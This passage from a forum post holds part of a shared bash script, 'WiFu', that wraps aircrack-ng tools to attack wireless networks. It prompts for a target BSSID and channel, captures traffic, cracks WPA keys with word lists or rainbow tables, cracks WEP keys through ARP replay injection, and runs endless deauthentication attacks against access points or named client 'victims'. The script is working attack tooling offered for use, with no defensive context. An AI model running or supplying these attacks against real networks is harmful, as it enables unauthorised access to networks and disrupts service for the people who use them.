echo -e "
\e[1;31m[!]\e[0m Invalid operation. Please try again.
"
fi
done
if [[ $how == 1 ]] ; then
where=1
while [[ $where == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the rainbow tables you will be using? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read rt
if [[ $rt == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m Invalid file path. Please try again.
"
else
clear
where=0
fi
done
cowpatty –s $net –d $rt –r ~/$name-01.cap || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
elif [[ $how == 2 ]] ; then
what=1
while [[ $what == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the absolute path to the dictionary or word-list you want to use? (You may drag-n-drop the file to populate, but do not leave trailing spaces!)
"
read word
if [[ $word == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m Invalid file path. Please try again.
"
else
clear
what=0
fi
done
aircrack-ng -l ~/cracked-password.txt -w $word ~/$name-01.ivs || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
fi
echo -e "
\e[1;32mAll Done!!!\e[0m - If you used a dictionary or word-list and your passphrase was found then it was saved to cracked-password.txt in your home directory. If you used rainbow tables and your passphrase was found it is listed above so take the time to record it now.
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
;;
##################### Start WEP
"WEP")
ncard=1
while [[ $ncard == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
clear
ncard=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
clear
airmon-ng start $card >>.trash.txt
echo -e "
\e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data.
"
sleep 5
konsole --new-tab -e airodump-ng mon0 2>>.trash.txt
qone=1
while [[ $qone == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the network you want to target?
"
read bssid
if [[ $bssid == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
clear
qone=0
fi
done
qtwo=1
while [[ $qtwo == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What channel is the network on?
"
read chan
if [[ $chan == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $chan == * ]] ; then
clear
qtwo=0
fi
done
qthree=1
while [[ $qthree == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What do you want to name the capture file?
"
read name
if [[ $name == "" ]] ; then
clear
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $name == * ]] ; then
qthree=0
fi
done
clear
echo -e "
\e[1;34m[*]\e[0m You now have 10 seconds to close the previousely opened tab. GO!
"
sleep 10
clear
konsole --new-tab -e airodump-ng -c $chan -w $name --bssid $bssid mon0 2>>.trash.txt
echo -e "
\e[1;34m[*]\e[0m OK, now starting WEP attack?
"
konsole --new-tab -e aireplay-ng -1 0 -a $bssid mon0
clear
konsole --new-tab -e aireplay-ng -3 -b $bssid mon0
echo -e "
\e[1;34m[*]\e[0m Wait a minute or two and watch the data rise in the first window that initially opened.
"
sleep 3
dat=1
while [[ $dat == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m Has the data risen to over 5K? [y|n]
"
read data
if [[ $data == y ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, time to crack the capture file!
"
sleep 3
dat=0
elif [[ $hand == n ]] ; then
clear
echo -e "
\e[1;34m[*]\e[0m OK, lets try again. You can press \e[1;31mCtrl+C\e[0m to go back to the main menu.
"
sleep 3
clear
else
clear
echo -e "
\e[1;31m[!]\e[0m Invalid operation. Please try again.
"
fi
done
aircrack-ng -l ~/cracked-password.txt ~/$name-01.cap || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
echo -e "
\e[1;32mAll Done!!!\e[0m - If your passphrase was found then it is shown above and was saved to cracked-password.txt in your home directory.
Press \e[1;31mCtrl+C\e[0m at any time to quit and return to the main menu.
"
;;
############### Start DOS
"DOS")
ncard=1
while [[ $ncard == 1 ]] ; do
clear
echo -e
ifconfig | grep wlan
echo -e "
\e[1;34m[*]\e[0m Wich of the above wireless interfaces would you like to put in monitor mode? [wlan0]
"
read card
if [[ $card == "" ]] ; then
card=wlan0
fi
if [[ $card == wlan* ]] ; then
clear
ncard=0
else
clear
echo -e "
\e[1;31m[!]\e[0m Not a valid wireless device. Please try again."
sleep 3
fi
done
clear
airmon-ng start $card >>.trash.txt
echo -e "
\e[1;34m[*]\e[0m New tabs will open running various commands to gather info. Come back to this tab to input data.
"
sleep 5
konsole --new-tab -e airodump-ng mon0 2>>.trash.txt
deny=1
while [[ $deny == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m Who is the victim of this attack? [1|2]
1) Access Point.
2) Connected Client.
"
read who
if [[ $who == "1" ]] ; then
clear
deny=0
elif [[ $who == "2" ]] ; then
clear
deny=0
else
echo -e "
\e[1;31m[!]\e[0m $who is not a valid entry. Please try again.
"
sleep 3
fi
done
if [[ $who == "1" ]] ; then
qone=1
while [[ $qone == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the acces point you want to attack?
"
read bssid
if [[ $bssid == "" ]] ; then
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
echo -e "
\e[1;34m[*]\e[0m OK. Now starting the DOS attack.
"
sleep 3
aireplay-ng -0 9999 -a $bssid mon0 || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
fi
done
else
qtwo=1
while [[ $qtwo == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the BSSID of the acces point you want to attack?
"
read bssid
if [[ $bssid == "" ]] ; then
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $bssid == * ]] ; then
clear
qtwo=0
fi
done
qthree=1
while [[ $qthree == 1 ]] ; do
echo -e "
\e[1;34m[*]\e[0m What is the clients station ID?
"
read station
if [[ $station == "" ]] ; then
echo -e "
\e[1;31m[!]\e[0m You didn't type anything. Please try again.
"
sleep 3
elif [[ $station == * ]] ; then
clear
qthree=0
fi
done
fi
echo -e "
\e[1;34m[*]\e[0m OK. Now starting the DOS attack.
"
sleep 3
aireplay-ng -0 9999 -a $bssid -c $station mon0 || { echo -e '
\e[1;31m[!]\e[0m Operation failed! Program will now exit.
' ; exit 1; }
;;
###################### Start Main Menu
"Main Menu")
break
;;
################### Start Quit
"Quit")
clear
echo -e "
\e[5;31mT\e[5;32mh\e[5;33ma\e[5;34mn\e[5;35mk \e[5;36mY\e[5;37mo\e[5;31mu \e[5;32mF\e[5;33mo\e[5;34mr \e[5;35mU\e[5;36ms\e[5;37mi\e[5;31mn\e[5;31mg \e[5;32mW\e[5;33mi\e[5;34mF\e[5;35mu\e[5;36m!\e[5;37m!\e[5;31m!\e[0m
"
exit 1
;;
*)
echo -e "
\e[1;31m[!]\e[0m Please choose a valid operation..."
sleep 3
break
esac
done
done
i think it is prefferance what one is better, but have fun
True Anons :: Operations :: Operations
Page 1 of 1
Permissions in this forum:
You cannot reply to topics in this forum